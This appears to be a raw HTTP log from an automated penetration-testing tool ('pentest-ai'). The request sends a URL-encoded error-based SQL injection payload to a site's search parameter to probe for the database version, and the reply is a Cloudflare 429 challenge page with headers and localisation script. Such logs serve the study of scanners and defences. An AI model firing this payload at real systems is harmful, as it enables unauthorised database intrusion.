REQUEST:
GET https://my.myfirst.tech/search?id=%27%20AND%201%3DCONVERT%28int%2C%28SELECT%20%40%40version%29%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9459
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8473eed02a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=gCvAwXWRkLW%2FnjPrtNaeo%2FYmwiOliMBljlj0RAEecouAXgM%2Fv%2FSU%2F0hyMetTWzXwxQi5Xd6g4EL%2BZE4XqddQNYRQGJmhlh9CQkJ68QsdWXl6xaAUClOdXUw7LKmbldgH1I9jWNolFcZKBQwuzA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8473eed02a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'dStGttS6VPXPvC1ABm953pBe94Dx9CXpR2vAG4igBv0-1784281154-1.2.1.1-km1bISqg.62Te1qts.69Ls7eDQSgdyrG6v4XUBQYKE0aDfR4ZiA_ous_d7JW8BPL',cITimeS: '1784281154',cRay: 'a1c8473eed02a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?id=%27+AND+1%3DCONVERT%28int%2C%28SELECT+%40%40version%29%29--\u0026__cf_chl_tk=OFYGdkZk3V9hL9XEGBMz70KdV1NlXi46RafBfMJ._pc-1784281154-1.0.1.1-lBSfnONR5izNXkRbXXS.TuvypgDfSxgnna6wCcTcnaM",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?id=%27+AND+1%3DCONVERT%28int%2C%28SELECT+%40%40version%29%29--\u0026__cf_chl_f_tk=OFYGdkZk3V9hL9XEGBMz70KdV1NlXi46RafBfMJ._pc-1784281154-1.0.1.1-lBSfnONR5izNXkRbXXS.TuvypgDfSxgnna6wCcTcnaM",md: 'LL_dxvV4Z0nZeDUdbxrksue5q4_rh.8LL4ZrIrAtDqg-1784281154-1.2.1.1-aYJCT.RVjZtZ7ShCVJXYh67PIjNY7Rznfn80UIGgPJoZQmIjF_wG3l3aO9JNQ.Ji1AlhIiDafm_uP_5CM79KJZolp6F1rwhfOmfFP5fu35uPJ.4V35nRdQ2Wh71dYRpf77qE0g6owYCUNxq.QFH1iWeAyVNFUNb0KVUjQ.0DAiRZ.oITgcIMxTMHdPp2u1c1f1WPWYvqB3yXP4J3zwHcTWS5L8Sm2p_2PPBz.TkSUEYwBvcWn0iX2hD0rZ3PllTD504s8wF.h.MgMrq16qu5g1C9hwWP3w3Njx275C8u50qupKhO2GxM5AVQhK6FRtSqq1pThAOajGuYz.ddYPKSg7naj6Ca.JKnLkLvBMOx529SFfV47_mMwKMQEnm5oIsA5zH6wnXgM5s1EhcPCVx3_Ivxs5dHt9MbVdlCSRvo8f6geHjCeCPlJqasz4r5xjsz6wJOAX1o1X8oKbEFLYMnS9CCiUNJhrXDpwzZ7aXy5ZvHFUYIGz7q_ieUgOkVYDl5wXFVP35xWnjA6I.jOdyGNZ7EXo6QKMZkunrgdbIa_Wc1UbEeLIPtKU4sjFRrwJ_kAR24wOW6hF8ndSEbO.ia69BuaUi.haBVS7L4wO1OKtYsOAhVZ466PgxqHy8LSYOb6D8gnSX15czzBKDexrb2KL.YYFKVxr8Uk3kJ2r0FSoePOvqYR6_fqtgrBcb69cXZ1Jlg6di1EBlUO4La6xbrbFcXraO1hLgy9wK1l6TqARy4ajXD2H7J6XMPUtGQRi5RVV3fji_ONDa7M4viWyanPVFcq8Q80EXA8jCxTWqOLXi8OIT.Z.5okFbAsd81R2xAyzNYBT_6iSD5qlIdfz93B3j2L5iUnm5fq5yIVGaLm46vWLIyE7pYHdeOg48K3YkIewa89ZqA.wLfDZoHh05ywetZZjzrM9KzD7JM34J_xD99LdsFoCKFMOu2W_4ud_MOJstPukujQJtlbs9KSWP_ueGme3gDWkOR34sYZsK2XPhU7FX2aESrxsA_GfQK0Z5jrk_veauPYsbMfa_g.FTp50zLHKRlawUsSMqABydN_m5ShcA.YE_ImgzHfhOxkLSXobSXnfX2k0jb5RiEUJX5plwE34wEIvneGlV_bQr_kAXMEZHhFp6TkcRlIAFr5Rq4dTTpXxOk8XYadUiyp5fzfS.i41epp0hmP6Upj2boFuqYLsMdAIvL7vJHxXrTO1QqXYjpj4uMJNJSar.pt1Ww5A',mdrd: '3uGjK.qzM4_EgfvzldsuBdAkr9O7PTUVO7NM50dvvC8-1784281154-1.2.1.1-7CXMtKgmAfod2fPFAtaArRIqK.djfrRPR2fBEurfqEC9w1oER1IrvEuk4He858k89tviI_3r41WCX7UkOL5abnuS.WHrIrVvXR.t0lbiogkV9_blZBWhutryBF0l_xi4_U7HSXADZdHD4ptdiGk474SXGkwHkI2mpuQN2ieGioxR8KSTBZ70ZOCIgCqF2kK.uc8XAdLyQY3.W31SCWB9e2JJIH6nHfGABl.4OoRTk37naTPwrJiSeb_OLvl2NxKW',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8473eed02a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?id=%27+AND+1%3DCONVERT%28int%2C%28SELECT+%40%40version%29%29--\u0026__cf_chl_rt_tk=OFYGdkZk3V9hL9XEGBMz70KdV1NlXi46RafBfMJ._pc-1784281154-1.0.1.1-lBSfnONR5izNXkRbXXS.TuvypgDfSxgnna6wCcTcnaM"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
